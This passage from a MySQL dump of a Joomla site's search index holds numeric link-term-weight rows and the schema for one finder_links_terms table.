(299, 320585, 0.51331),
(299, 320586, 1.07331),
(299, 320587, 1.23669),
(299, 320588, 0.81669),
(299, 320589, 0.88669),
(299, 320590, 0.37331),
(299, 320591, 1.00331),
(299, 320592, 1.16669),
(299, 320593, 0.98),
(299, 320594, 1.05),
(299, 320595, 1.00331),
(299, 320596, 1.09669),
(299, 320597, 0.18669),
(299, 320598, 0.91),
(299, 320599, 1.00331),
(299, 320600, 1.05),
(299, 320601, 1.16669),
(299, 320602, 0.84),
(299, 320603, 0.91),
(299, 320604, 1.77338),
(299, 320605, 2.1),
(299, 320606, 0.93331),
(299, 320607, 1.00331),
(299, 320608, 0.95669),
(299, 320609, 0.88669),
(299, 320610, 0.95669),
(299, 320611, 0.86331),
(306, 320611, 0.86331),
(299, 320612, 1.19),
(299, 320613, 0.93331),
(299, 320614, 1.09669),
(299, 320615, 1.07331),
(299, 320616, 0.84),
(299, 320617, 0.91),
(299, 320618, 0.88669),
(299, 320619, 0.93331),
(299, 320620, 1.02669),
(299, 320621, 0.93331),
(299, 320622, 1.07331),
(299, 320623, 1.02669),
(299, 320624, 1.09669),
(299, 320625, 0.95669),
(299, 320626, 1.02669),
(299, 320627, 1.05),
(299, 320628, 0.91),
(299, 320629, 1.09669),
(299, 320630, 0.88669),
(299, 320631, 0.95669),
(299, 320632, 0.93331),
(299, 320633, 1.05),
(299, 320634, 0.91),
(299, 320635, 0.98),
(299, 320636, 0.88669),
(299, 320637, 1.05),
(299, 320638, 0.95669),
(299, 320639, 1.07331),
(299, 320640, 0.91),
(299, 320641, 1.09669),
(299, 320642, 0.93331),
(299, 320643, 1.07331),
(299, 320644, 1.00331),
(299, 320645, 0.98),
(299, 320646, 1.02669),
(299, 320647, 1.12),
(299, 320648, 0.95669),
(299, 320649, 0.88669),
(299, 320650, 0.95669),
(299, 320651, 0.95669),
(299, 320652, 0.84),
(299, 320653, 0.95669),
(299, 320654, 1.07331),
(299, 320655, 0.98),
(299, 320656, 1.07331),
(299, 320657, 0.93331),
(299, 320658, 1.00331),
(299, 320659, 1.14331),
(299, 320660, 1.14331),
(299, 320661, 0.91),
(299, 320662, 1.09669),
(299, 320663, 0.98),
(299, 320664, 1.02669),
(299, 320665, 0.88669),
(299, 320666, 0.95669),
(299, 320667, 0.95669),
(299, 320668, 0.98),
(299, 320669, 0.88669),
(299, 320670, 0.95669),
(299, 320671, 0.93331),
(299, 320672, 1.00331),
(299, 320673, 1.00331),
(299, 320674, 1.14331),
(299, 320675, 0.91),
(299, 320676, 1.02669),
(299, 320677, 0.91),
(299, 320678, 1.02669),
(299, 320679, 0.95669),
(299, 320680, 1.16669),
(299, 320681, 0.42),
(299, 320682, 1.05),
(299, 320683, 1.12),
(299, 320684, 0.93331),
(299, 320685, 0.95669),
(299, 320686, 1.05),
(299, 320687, 0.98),
(299, 320688, 0.93331),
(299, 320689, 0.84),
(299, 320690, 1.00331),
(299, 320691, 0.93331),
(299, 320692, 1.07331),
(299, 320693, 1.05),
(299, 320694, 0.93331),
(299, 320695, 1.05),
(299, 320696, 0.98),
(299, 320697, 1.05),
(299, 320698, 0.81669),
(299, 320699, 1.00331),
(299, 320700, 0.91),
(299, 320701, 1.02669),
(299, 320702, 0.86331),
(299, 320703, 0.93331),
(299, 320704, 0.81669),
(299, 320705, 1.02669),
(299, 320706, 1.00331),
(299, 320707, 0.95669),
(299, 320708, 1.00331),
(299, 320709, 1.14331),
(299, 320710, 0.65338),
(299, 320711, 0.98),
(299, 320712, 1.12),
(299, 320713, 1.00331),
(299, 320714, 1.21331),
(299, 320715, 1.02669),
(299, 320716, 1.21331),
(299, 320717, 1.00331),
(299, 320718, 1.09669),
(299, 320719, 1.05),
(299, 320720, 0.95669),
(299, 320721, 1.05),
(299, 321347, 0.93331),
(299, 321348, 1.07331),
(299, 321349, 0.98),
(299, 321350, 1.14331),
(299, 321351, 0.51331),
(299, 321352, 1.07331),
(299, 321353, 1.12),
(299, 321354, 0.95669),
(299, 321355, 1.05),
(299, 321356, 0.98),
(299, 321357, 1.05),
(299, 321358, 0.88669),
(299, 321359, 1.05),
(299, 321360, 1.00331),
(299, 321361, 1.07331),
(299, 321362, 0.88669),
(299, 321363, 0.98),
(299, 321364, 0.91),
(299, 321365, 1.02669),
(299, 321366, 0.91),
(299, 321367, 1.00331),
(299, 321368, 0.88669),
(299, 321369, 0.93331),
(299, 321370, 0.88669),
(299, 321371, 0.95669),
(299, 321372, 1.00331),
(299, 321373, 1.12),
(299, 321374, 0.95669),
(299, 321375, 1.00331),
(299, 321376, 1.05),
(299, 321377, 1.14331),
(299, 321378, 1.05),
(299, 321379, 1.12),
(299, 321380, 0.98),
(299, 321381, 1.07331),
(299, 321382, 0.93331),
(299, 321383, 1.05),
(299, 321384, 1.02669),
(299, 321385, 1.05),
(299, 321386, 1.12),
(299, 321387, 0.93331),
(299, 321388, 1.09669),
(299, 321389, 0.88669),
(299, 321390, 1.00331),
(299, 321391, 0.98),
(299, 321392, 0.98),
(299, 321393, 1.07331),
(299, 321394, 0.98),
(299, 321395, 1.26),
(299, 321396, 0.88669),
(299, 321397, 1.02669),
(299, 321398, 1.00331),
(299, 321399, 1.07331),
(299, 321400, 1.00331),
(299, 321401, 1.12),
(299, 321402, 0.88669),
(299, 321403, 0.98),
(299, 321404, 0.23331),
(299, 321405, 1.02669),
(299, 321406, 1.12),
(299, 321407, 0.18669),
(299, 321408, 0.88669),
(299, 321409, 1.02669),
(299, 321410, 0.88669),
(299, 321411, 1.02669),
(299, 321412, 0.93331),
(299, 321413, 1.05),
(299, 321414, 0.95669),
(299, 321415, 0.86331),
(299, 321416, 1.02669),
(299, 321417, 0.93331),
(299, 321418, 1.05),
(299, 321419, 0.56),
(299, 321420, 1.00331),
(299, 321421, 1.05),
(299, 321422, 0.98),
(299, 321423, 1.07331),
(299, 321424, 0.46669),
(299, 321425, 1.00331),
(299, 321426, 1.12),
(299, 321427, 0.37331),
(299, 321428, 1.09669),
(299, 321429, 1.16669),
(299, 321430, 0.56),
(299, 321431, 1.86662),
(299, 321432, 1.05),
(299, 321433, 1.05),
(299, 321434, 0.93331),
(306, 321434, 0.93331),
(299, 321435, 1.09669),
(299, 321436, 0.95669),
(299, 321437, 1.05),
(299, 321438, 0.93331),
(299, 321439, 1.05),
(299, 321440, 0.84),
(299, 321441, 0.93331),
(299, 321442, 0.91),
(299, 321443, 0.98),
(299, 321444, 0.95669),
(304, 321444, 0.95669),
(299, 321445, 1.07331),
(299, 321446, 0.91),
(299, 321447, 1.14331),
(299, 321448, 0.93331),
(299, 321449, 1.07331),
(299, 321450, 1.30669),
(299, 321451, 1.09669),
(299, 321452, 1.30669),
(299, 321453, 0.91),
(299, 321454, 1.02669),
(299, 321455, 1.05),
(299, 321456, 1.16669),
(299, 321457, 0.88669),
(299, 321458, 0.95669),
(299, 321459, 0.86331),
(299, 321460, 1.02669),
(304, 323829, 0.46669),
(305, 323829, 0.46669),
(304, 323830, 1.07331),
(305, 323830, 1.07331),
(304, 324459, 0.18669),
(305, 324459, 0.37338),
(304, 324512, 0.88669),
(305, 324512, 0.88669),
(305, 324546, 0.93331),
(304, 324546, 1.86662),
(304, 324824, 1.02669),
(304, 324825, 0.98),
(304, 324826, 2.52),
(304, 324827, 1.96),
(304, 324828, 1.12),
(304, 324829, 1.09669),
(304, 324830, 0.98),
(304, 324831, 0.88669),
(304, 324832, 1.00331),
(304, 324833, 0.98),
(304, 324834, 0.84),
(304, 324835, 1.09669),
(304, 324836, 1.77338),
(304, 324837, 1.09669),
(304, 324838, 1.05),
(304, 324839, 0.98),
(304, 324840, 0.93331),
(304, 324841, 1.07331),
(304, 324842, 1.00331),
(304, 324843, 1.28331),
(304, 324844, 1.19),
(304, 324845, 0.91),
(304, 324846, 1.00331),
(304, 324847, 0.95669),
(304, 324848, 0.42),
(304, 324849, 0.98),
(304, 324850, 1.19),
(304, 324851, 0.32669),
(304, 324852, 0.95669),
(304, 324853, 1.05),
(304, 324854, 1.19),
(304, 324855, 1.07331),
(304, 324856, 0.93331),
(304, 324857, 1.00331),
(304, 324858, 0.91),
(304, 324859, 1.68),
(304, 324860, 1.07331),
(304, 324861, 1.12),
(304, 324862, 1.05),
(304, 324863, 1.16669),
(304, 324864, 1.02669),
(304, 324865, 0.98),
(306, 324865, 0.98),
(304, 324866, 1.07331),
(304, 324867, 0.93331),
(304, 324868, 1.16669),
(304, 324869, 0.86331),
(304, 324870, 0.98),
(304, 324871, 0.32669),
(304, 324872, 1.05),
(304, 324873, 1.16669),
(304, 324874, 1.00331),
(304, 324875, 1.09669),
(304, 324876, 0.88669),
(304, 324877, 1.05),
(304, 324878, 0.98),
(304, 324879, 0.86331),
(304, 324880, 0.95669),
(304, 324881, 1.02669),
(304, 324882, 0.81669),
(304, 324883, 1.00331),
(304, 324884, 0.95669),
(304, 324885, 0.56),
(304, 324886, 0.88669),
(304, 324887, 1.09669),
(304, 324888, 0.91),
(304, 324889, 1.05),
(304, 324890, 0.51331),
(304, 324891, 1.14331),
(304, 324892, 1.23669),
(304, 324893, 0.95669),
(304, 324894, 0.95669),
(304, 324895, 1.00331),
(304, 324896, 1.09669),
(304, 324897, 1.07331),
(304, 324898, 1.00331),
(304, 324899, 1.16669),
(304, 324900, 1.02669),
(304, 324901, 1.21331),
(304, 324902, 0.95669),
(304, 324903, 1.23669),
(304, 324904, 0.42),
(304, 324905, 0.98),
(304, 324906, 1.07331),
(304, 324907, 1.16669),
(304, 324908, 1.05),
(304, 325304, 0.88669),
(304, 325305, 0.95669),
(304, 325306, 1.05),
(304, 325307, 0.56),
(304, 325308, 1.05),
(304, 325309, 1.23669),
(304, 325310, 1.00331),
(304, 325311, 1.19),
(304, 325312, 0.95669),
(304, 325313, 1.07331),
(304, 325314, 0.98),
(304, 325315, 1.07331),
(304, 325316, 1.00331),
(304, 325317, 1.23669),
(304, 325318, 1.02669),
(304, 325319, 1.12),
(304, 325320, 1.21331),
(304, 325321, 1.33),
(304, 325322, 2.1),
(304, 325323, 1.16669),
(304, 325324, 1.14331),
(304, 325325, 1.14331),
(304, 325326, 1.23669),
(304, 325327, 1.02669),
(304, 325328, 1.14331),
(304, 325329, 1.07331),
(304, 325330, 1.16669),
(304, 325331, 1.09669),
(304, 325332, 1.21331),
(304, 325333, 1.05),
(304, 325334, 1.12),
(304, 325335, 1.07331),
(304, 325336, 1.16669),
(304, 325337, 1.07331),
(304, 325338, 1.23669),
(304, 325339, 1.07331),
(304, 325340, 1.14331),
(304, 325341, 1.07331),
(304, 325342, 1.19),
(304, 325343, 1.14331),
(304, 325344, 3.36),
(304, 325345, 1.05),
(304, 325346, 1.14331),
(304, 325347, 1.05),
(304, 325348, 0.42),
(304, 325349, 0.95669),
(304, 325350, 1.09669),
(304, 325351, 1.16669),
(304, 325352, 1.23669),
(304, 325353, 1.05),
(304, 325354, 1.00331),
(304, 325355, 1.14331),
(304, 325356, 1.07331),
(304, 325357, 1.19),
(304, 325358, 0.23331),
(304, 325359, 0.88669),
(304, 325360, 1.00331),
(304, 325361, 0.98),
(304, 325362, 1.26),
(304, 325363, 1.09669),
(304, 325364, 0.98),
(304, 325365, 1.16669),
(304, 325366, 0.93331),
(304, 325367, 1.00331),
(304, 325368, 1.00331),
(304, 325369, 1.05),
(304, 325370, 1.16669),
(304, 325371, 1.07331),
(304, 325372, 1.02669),
(304, 325373, 1.19),
(304, 325374, 1.12),
(304, 325375, 1.07331),
(304, 325376, 1.02669),
(304, 325377, 1.07331),
(304, 325378, 1.09669),
(304, 325379, 0.95669),
(304, 325380, 1.12),
(304, 325381, 1.00331),
(304, 325382, 1.12),
(304, 325383, 1.12),
(304, 325384, 0.51331),
(304, 325385, 1.07331),
(304, 325386, 1.12),
(304, 325387, 0.98),
(304, 325388, 1.16669),
(304, 325389, 0.93331),
(304, 325390, 1.05),
(304, 325391, 0.93331),
(304, 325392, 1.02669),
(305, 325848, 0.84),
(305, 325849, 0.95669),
(305, 325850, 0.98),
(305, 325851, 1.21331),
(305, 325852, 0.98),
(305, 325853, 1.21331),
(305, 325854, 1.05),
(305, 325855, 1.16669),
(305, 325856, 0.81669),
(305, 325857, 0.91),
(305, 325858, 0.95669),
(305, 325859, 1.02669),
(305, 325860, 1.09669),
(305, 325861, 1.07331),
(305, 325862, 0.88669),
(305, 325863, 1.14331),
(305, 325864, 0.86331),
(305, 325865, 0.93331),
(305, 325866, 0.98),
(305, 325867, 1.12),
(305, 325868, 1.02669),
(305, 325869, 1.00331),
(305, 325870, 1.12),
(305, 325871, 0.93331),
(305, 325872, 1.00331),
(305, 325873, 1.12),
(305, 325874, 1.26),
(305, 325875, 1.09669),
(305, 325876, 1.16669),
(305, 325877, 1.21331),
(305, 325878, 1.16669),
(305, 325879, 0.93331),
(305, 325880, 1.05),
(305, 325881, 0.93331),
(305, 325882, 0.88669),
(305, 325883, 0.98),
(305, 325884, 0.93331),
(305, 325885, 1.14331),
(305, 325886, 1.00331),
(305, 325887, 1.09669),
(305, 325888, 0.95669),
(305, 325889, 1.02669),
(305, 325890, 1.02669),
(305, 325891, 0.91),
(305, 325892, 0.98),
(305, 325893, 0.86331),
(305, 325894, 0.95669),
(305, 325895, 0.98),
(305, 325896, 1.12),
(305, 325897, 1.00331),
(305, 325898, 1.12),
(305, 325899, 0.93331),
(305, 325900, 1.09669),
(305, 325901, 2.94),
(305, 325902, 1.05),
(305, 325903, 1.05),
(305, 325904, 1.07331),
(305, 325905, 1.07331),
(305, 325906, 1.12),
(305, 325907, 0.93331),
(305, 325908, 1.02669),
(305, 325909, 1.00331),
(305, 325910, 0.88669),
(306, 325910, 0.88669),
(305, 325911, 0.98),
(305, 325912, 0.95669),
(305, 325913, 1.12),
(305, 325914, 1.00331),
(305, 325915, 1.21331),
(305, 325916, 1.12),
(305, 325917, 1.19),
(305, 325918, 0.98),
(305, 325919, 1.05),
(305, 325920, 0.98),
(305, 325921, 1.16669),
(305, 325922, 0.93331),
(305, 325923, 1.02669),
(305, 325924, 1.09669),
(305, 325925, 0.81669),
(305, 325926, 0.95669),
(305, 325927, 1.00331),
(305, 325928, 1.12),
(305, 325929, 1.05),
(305, 325930, 1.16669),
(305, 325931, 1.12),
(305, 325932, 0.93331),
(305, 325933, 1.05),
(305, 325934, 1.05),
(305, 325935, 0.91),
(305, 325936, 1.14331),
(305, 325937, 0.98),
(305, 325938, 0.91),
(305, 325939, 0.95669),
(305, 325940, 2.14662),
(305, 325941, 2.70662),
(305, 325942, 1.09669),
(305, 325943, 1.21331),
(305, 325944, 1.02669),
(305, 325945, 1.16669),
(305, 325946, 0.88669),
(305, 325947, 0.98),
(305, 325948, 0.93331),
(305, 325949, 0.98),
(305, 325950, 0.86331),
(305, 325951, 0.95669),
(305, 326487, 0.86331),
(305, 326488, 0.95669),
(305, 326489, 0.91),
(305, 326490, 1.00331),
(305, 326491, 0.86331),
(305, 326492, 1.02669),
(305, 326493, 0.88669),
(305, 326494, 1.00331),
(305, 326495, 0.84),
(305, 326496, 0.98),
(305, 326497, 0.93331),
(305, 326498, 1.02669),
(305, 326499, 0.88669),
(305, 326500, 1.00331),
(305, 326501, 1.07331),
(305, 326502, 1.21331),
(305, 326503, 1.05),
(305, 326504, 0.91),
(305, 326505, 1.00331),
(305, 326506, 0.95669),
(305, 326507, 1.05),
(305, 326508, 1.07331),
(305, 326509, 0.95669),
(305, 326510, 1.02669),
(305, 326511, 1.02669),
(305, 326512, 0.93331),
(305, 326513, 1.02669),
(305, 326514, 0.98),
(305, 326515, 1.09669),
(305, 326516, 0.95669),
(305, 326517, 0.95669),
(305, 326518, 1.12),
(305, 326519, 0.95669),
(305, 326520, 1.02669),
(305, 326521, 1.00331),
(305, 326522, 1.07331),
(305, 326523, 0.95669),
(305, 326524, 1.19),
(305, 326525, 0.93331),
(305, 326526, 1.16669),
(305, 326527, 0.98),
(305, 326528, 1.12),
(305, 326529, 1.96),
(305, 326530, 2.1),
(305, 326531, 1.14331),
(305, 326532, 1.21331),
(305, 326533, 1.05),
(305, 326534, 1.12),
(305, 326535, 1.19),
(305, 326536, 0.46669),
(305, 326537, 1.07331),
(305, 326538, 1.19),
(305, 326539, 1.02669),
(305, 326540, 0.88669),
(305, 326541, 1.02669),
(305, 326542, 0.88669),
(305, 326543, 1.02669),
(305, 326544, 0.88669),
(305, 326545, 1.00331),
(305, 326546, 1.19),
(305, 326547, 0.98),
(305, 326548, 0.91),
(305, 326549, 1.02669),
(305, 326550, 1.09669),
(305, 326551, 1.19),
(305, 326552, 1.05),
(305, 326553, 1.12),
(305, 326554, 0.93331),
(305, 326555, 1.12),
(305, 326556, 1.00331),
(305, 326557, 1.14331),
(305, 326558, 1.00331),
(305, 326559, 1.09669),
(305, 326560, 1.16669),
(305, 326561, 0.95669),
(305, 326562, 1.05),
(305, 326563, 0.98),
(305, 326564, 1.07331),
(305, 326565, 1.00331),
(305, 326566, 1.12),
(305, 326567, 1.07331),
(305, 326568, 1.02669),
(305, 326569, 1.07331),
(305, 326570, 0.98),
(305, 326571, 1.12),
(305, 326572, 1.05),
(305, 326573, 0.93338),
(305, 326574, 0.98),
(305, 326575, 1.05),
(305, 326576, 1.00331),
(305, 326577, 1.16669),
(305, 326578, 2.38),
(305, 326579, 1.33),
(305, 326580, 1.26),
(305, 326581, 0.91),
(305, 326582, 1.19),
(305, 326583, 0.95669),
(305, 326584, 1.19),
(305, 326585, 1.09669),
(305, 326586, 1.26),
(305, 326587, 0.56),
(305, 326588, 1.91338),
(305, 326589, 1.05),
(305, 326590, 1.05),
(305, 326591, 0.32669),
(305, 326592, 0.98),
(305, 326593, 1.07331),
(305, 326594, 1.96),
(305, 326595, 2.38),
(305, 326596, 1.09669),
(305, 326597, 1.21331),
(305, 326598, 0.51331),
(305, 326599, 1.07331),
(305, 326600, 1.14331),
(306, 326816, 0.93331),
(306, 326817, 1.05),
(306, 326818, 0.91),
(306, 326819, 2.00662),
(306, 326820, 1.07331),
(306, 326821, 1.07331),
(306, 326822, 0.98),
(306, 326823, 1.23669),
(306, 326824, 1.82),
(306, 326825, 1.14331),
(306, 326826, 1.07331),
(306, 326827, 0.93331),
(306, 326828, 0.98),
(306, 326829, 3.92),
(306, 326830, 1.07331),
(306, 326831, 1.02669),
(306, 326832, 1.05),
(306, 326833, 1.12),
(306, 326834, 0.84),
(306, 326835, 1.09669),
(306, 326836, 2.1),
(306, 326837, 0.98),
(306, 326838, 0.95669),
(306, 326839, 1.00331),
(306, 326840, 0.86331),
(306, 326841, 1.07331),
(306, 326842, 0.98),
(306, 326843, 1.02669),
(306, 326844, 1.14331),
(306, 326845, 1.05),
(306, 326846, 0.91),
(306, 326847, 0.98),
(306, 326848, 0.91),
(306, 326849, 0.95669),
(306, 326850, 0.88669),
(306, 326851, 0.98),
(306, 326852, 0.98),
(306, 326853, 0.84),
(306, 326854, 0.93331),
(306, 326855, 1.16669),
(306, 326856, 1.02669),
(306, 326857, 0.98),
(306, 326858, 1.28331),
(306, 326859, 1.00331),
(306, 326860, 1.86662),
(306, 326861, 1.12),
(306, 326862, 1.02669),
(306, 326863, 1.00331),
(306, 326864, 0.46669),
(306, 326865, 1.00331),
(306, 326866, 1.09669),
(306, 326867, 0.95669),
(306, 326868, 1.07331),
(306, 326869, 1.02669),
(306, 326870, 1.09669),
(306, 326871, 0.91),
(306, 326872, 1.02669),
(306, 326873, 0.93331),
(306, 326874, 1.02669),
(306, 326875, 0.95669),
(306, 326876, 1.05),
(306, 326877, 0.93331),
(306, 326878, 1.02669),
(306, 326879, 0.95669),
(306, 326880, 1.02669),
(306, 326881, 0.98),
(306, 326882, 1.02669),
(306, 326883, 0.98),
(306, 326884, 1.16669),
(306, 326885, 1.12),
(306, 326886, 1.07331),
(306, 326887, 2.61317),
(306, 326888, 0.98),
(306, 326889, 1.09669),
(306, 326890, 0.98),
(306, 326891, 1.14331),
(306, 326892, 0.93331),
(306, 326893, 1.05),
(306, 326894, 0.93331),
(306, 326895, 0.98),
(306, 326896, 1.02669),
(306, 326897, 1.23669),
(306, 326898, 1.00331),
(306, 326899, 1.16669),
(306, 326900, 0.98),
(306, 326901, 1.09669),
(306, 326902, 1.00331),
(306, 326903, 1.09669),
(306, 326904, 1.00331),
(306, 326905, 1.21331),
(306, 326906, 0.98),
(306, 326907, 1.05),
(306, 326908, 0.18669),
(306, 326909, 0.98),
(306, 326910, 1.07331),
(306, 326911, 0.88669),
(306, 326912, 1.12),
(306, 326913, 0.98),
(306, 326914, 1.09669),
(306, 326915, 1.12),
(306, 326916, 1.09669),
(306, 326917, 0.95669),
(306, 326918, 1.09669),
(306, 326919, 0.98),
(306, 326920, 1.12),
(306, 326921, 0.32669),
(306, 326922, 0.95669),
(306, 326923, 1.12),
(306, 326924, 0.93331),
(306, 326925, 1.00331),
(306, 326926, 1.07331),
(306, 326927, 3.29007),
(306, 326928, 0.95669),
(306, 326929, 1.16669),
(306, 326930, 1.00331),
(306, 326931, 1.07331),
(306, 326932, 1.07331),
(306, 326933, 1.16669),
(306, 326934, 1.05),
(306, 326935, 1.23669),
(306, 326936, 0.91),
(306, 326937, 1.02669),
(306, 326938, 1.12),
(306, 326939, 1.05),
(306, 326940, 0.98),
(306, 326941, 0.95669),
(306, 326942, 0.95669),
(306, 326943, 0.91),
(306, 326944, 0.95669),
(306, 326945, 0.91),
(306, 326946, 1.00331),
(306, 326947, 1.12),
(306, 326948, 1.07331),
(306, 326949, 1.16669),
(306, 326950, 1.05),
(306, 326951, 0.95669),
(306, 326952, 0.98),
(306, 326953, 1.07331),
(306, 326954, 1.02669),
(306, 326955, 0.93331),
(306, 326956, 0.95669),
(306, 326957, 1.91338),
(306, 326958, 1.05),
(306, 326959, 1.07331),
(306, 326960, 0.93331),
(306, 326961, 1.00331),
(306, 326962, 0.98),
(306, 326963, 1.00331),
(306, 326964, 0.98),
(306, 326965, 1.05),
(306, 326966, 1.07331),
(306, 326967, 0.98),
(306, 326968, 0.91),
(306, 326969, 1.02669),
(306, 326970, 0.93331),
(306, 326971, 1.16669),
(306, 326972, 0.98),
(306, 326973, 1.05),
(306, 326974, 1.09669),
(306, 326975, 1.19),
(306, 326976, 1.05),
(306, 326977, 1.14331),
(306, 326978, 1.23669),
(306, 326979, 0.95669),
(306, 326980, 1.09669),
(306, 326981, 1.02669),
(306, 326982, 1.14331),
(306, 326983, 1.12),
(306, 326984, 1.02669),
(306, 326985, 0.98),
(306, 326986, 0.98),
(306, 326987, 1.07331),
(306, 326988, 1.02669),
(306, 326989, 1.77338),
(306, 326990, 0.95669),
(306, 326991, 0.95669),
(306, 326992, 0.86331),
(306, 326993, 0.98),
(306, 326994, 1.05),
(306, 326995, 0.93331),
(306, 326996, 1.09669),
(306, 326997, 1.00331),
(306, 326998, 1.09669),
(306, 326999, 0.98),
(306, 327000, 1.07331),
(306, 327001, 1.02669),
(306, 327002, 0.93331),
(306, 327003, 0.95669),
(306, 327004, 0.84),
(306, 327005, 0.93331),
(306, 327006, 0.95669),
(306, 327007, 0.98),
(306, 327008, 1.19),
(306, 327009, 0.81669),
(306, 327010, 0.88669),
(306, 327011, 1.00331),
(306, 327012, 1.12),
(306, 327013, 1.19),
(306, 327014, 1.26),
(306, 327015, 1.00331),
(306, 327016, 1.12),
(306, 327017, 4.10676),
(306, 327018, 1.19),
(306, 327019, 1.14331),
(306, 327020, 1.12),
(306, 327021, 1.14331),
(306, 327022, 1.19),
(306, 327023, 1.00331),
(306, 327024, 1.19),
(306, 327025, 1.00331),
(306, 327026, 1.09669),
(306, 327027, 1.09669),
(306, 327028, 1.09669),
(306, 327029, 1.05),
(306, 327030, 1.23669),
(306, 327031, 1.00331),
(306, 327032, 1.09669),
(306, 327033, 1.00331),
(306, 327034, 1.09669),
(306, 327035, 1.07331),
(306, 327036, 1.14331),
(306, 327037, 1.19),
(306, 327038, 1.30669),
(306, 327039, 3.03981),
(306, 327040, 8.16981),
(306, 327041, 9.12),
(306, 327042, 0.98),
(306, 327043, 1.00331),
(306, 327044, 0.93331),
(306, 327045, 0.98),
(306, 327046, 0.95669),
(306, 327047, 1.07331),
(306, 327048, 1.21331),
(306, 327049, 0.98),
(306, 327050, 1.12),
(306, 328070, 2.00662),
(306, 328071, 0.91),
(306, 328072, 1.05),
(306, 328073, 0.91),
(306, 328074, 1.00331),
(306, 328075, 1.07331),
(306, 328076, 0.86331),
(306, 328077, 0.95669),
(306, 328078, 0.93331),
(306, 328079, 1.07331),
(306, 328080, 0.93331),
(306, 328081, 1.02669),
(306, 328082, 0.86331),
(306, 328083, 0.93331),
(306, 328084, 1.05),
(306, 328085, 0.88669),
(306, 328086, 0.95669),
(306, 328087, 0.86331),
(306, 328088, 0.95669),
(306, 328089, 0.32669),
(306, 328090, 0.91),
(306, 328091, 1.19),
(306, 328092, 0.88669),
(306, 328093, 1.09669),
(306, 328094, 1.05),
(306, 328095, 1.16669),
(306, 328096, 1.09669),
(306, 328097, 1.05),
(306, 328098, 0.98),
(306, 328099, 1.02669),
(306, 328100, 0.42),
(306, 328101, 1.05),
(306, 328102, 1.26),
(306, 328103, 1.05),
(306, 328104, 1.02669),
(306, 328105, 1.12),
(306, 328106, 0.86331),
(306, 328107, 0.93331),
(306, 328108, 0.88669),
(306, 328109, 0.93331),
(306, 328110, 1.00331),
(306, 328111, 0.95669),
(306, 328112, 1.05),
(306, 328113, 0.95669),
(306, 328114, 1.02669),
(306, 328115, 1.00331),
(306, 328116, 1.02669),
(306, 328117, 0.28),
(306, 328118, 0.93331),
(306, 328119, 1.02669),
(306, 328120, 0.88669),
(306, 328121, 0.98),
(306, 328122, 0.84),
(306, 328123, 0.95669),
(306, 328124, 0.81669),
(306, 328125, 0.88669),
(306, 328126, 0.93331),
(306, 328127, 0.95669),
(306, 328128, 0.86331),
(306, 328129, 0.95669),
(306, 328130, 0.95669),
(306, 328131, 1.07331),
(306, 328132, 1.00331),
(306, 328133, 1.09669),
(306, 328134, 1.96),
(306, 328135, 1.12),
(306, 328136, 1.16669),
(306, 328137, 1.00331),
(306, 328138, 1.14331),
(306, 328139, 0.98),
(306, 328140, 1.07331),
(306, 328141, 1.19),
(306, 328142, 1.02669),
(306, 328143, 1.00331),
(306, 328144, 0.98),
(306, 328145, 1.21331),
(306, 328146, 1.05),
(306, 328147, 0.91),
(306, 328148, 1.02669),
(306, 328149, 1.00331),
(306, 328150, 1.09669),
(306, 328151, 0.65331),
(306, 328152, 1.12),
(306, 328153, 1.4),
(306, 328154, 1.00331),
(308, 328913, 1.12),
(308, 328914, 1.02669),
(308, 328915, 1.14331),
(308, 328916, 1.30669),
(308, 328917, 1.09669),
(308, 328918, 1.16669),
(308, 328919, 1.02669),
(308, 328920, 1.12),
(308, 328921, 0.98);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_terms1`
--

CREATE TABLE `y57u5_finder_links_terms1` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_terms1`
--

INSERT INTO `y57u5_finder_links_terms1` (`link_id`, `term_id`, `weight`) VALUES
(161, 1196, 0.07),
(193, 1196, 0.07),
(239, 1196, 0.07),
(245, 1196, 0.07),
(248, 1196, 0.07),
(255, 1196, 0.07),
(258, 1196, 0.07),
(262, 1196, 0.07),
(268, 1196, 0.07),
(292, 1196, 0.07),
(294, 1196, 0.07),
(299, 1196, 0.07),
(304, 1196, 0.07),
(233, 1196, 0.14),
(236, 1196, 0.14),
(238, 1196, 0.14),
(246, 1196, 0.14),
(247, 1196, 0.14),
(287, 1196, 0.14),
(305, 1196, 0.14),
(249, 1196, 0.17),
(44, 1196, 0.2),
(168, 1196, 0.21),
(240, 1196, 0.28),
(251, 1196, 0.37),
(161, 1199, 0.14),
(241, 1199, 0.14),
(305, 1199, 0.74),
(240, 10395, 0.81669),
(251, 10395, 2.3334),
(44, 25913, 2.5334),
(44, 25914, 2.6666),
(161, 189311, 0.91),
(161, 189312, 1.12),
(161, 189313, 0.86331),
(161, 189314, 1.00331),
(168, 197587, 0.79331),
(168, 197588, 0.88669),
(168, 197589, 0.84),
(168, 197590, 0.93331),
(168, 197591, 0.84),
(168, 197592, 0.91),
(168, 197593, 0.23331),
(168, 197594, 0.86331),
(168, 197595, 0.93331),
(168, 197596, 0.28),
(168, 197597, 0.88669),
(168, 197598, 0.95669),
(168, 197599, 1.05),
(168, 197600, 1.16669),
(168, 197601, 0.28),
(168, 197602, 0.81669),
(168, 197603, 0.91),
(168, 197604, 0.79331),
(168, 197605, 0.91),
(178, 221190, 0.14),
(178, 221191, 0.81669),
(178, 221192, 0.93331),
(178, 221193, 0.56),
(178, 221194, 0.81669),
(178, 221195, 0.95669),
(178, 221196, 0.79331),
(178, 221197, 0.98),
(178, 221198, 0.79331),
(178, 221199, 0.91),
(178, 221200, 0.79331),
(178, 221201, 0.95669),
(193, 238112, 0.91),
(193, 238113, 1.02669),
(233, 266353, 0.77),
(233, 266354, 0.84),
(233, 266355, 0.79331),
(233, 266356, 0.95669),
(236, 268495, 0.77),
(236, 268496, 1.00331),
(236, 268497, 0.79331),
(236, 268498, 0.91),
(238, 270514, 0.79331),
(238, 270515, 0.84),
(238, 270516, 0.79331),
(238, 270517, 1.07331),
(238, 270518, 0.21),
(238, 270519, 0.88669),
(238, 270520, 0.95669),
(239, 272481, 0.91),
(239, 272482, 0.98),
(240, 274546, 0.86331),
(240, 274547, 0.93331),
(240, 274548, 0.79331),
(240, 274549, 0.86331),
(240, 274550, 0.86331),
(240, 274551, 1.05),
(240, 274552, 0.91),
(241, 276554, 0.81669),
(241, 276555, 0.93331),
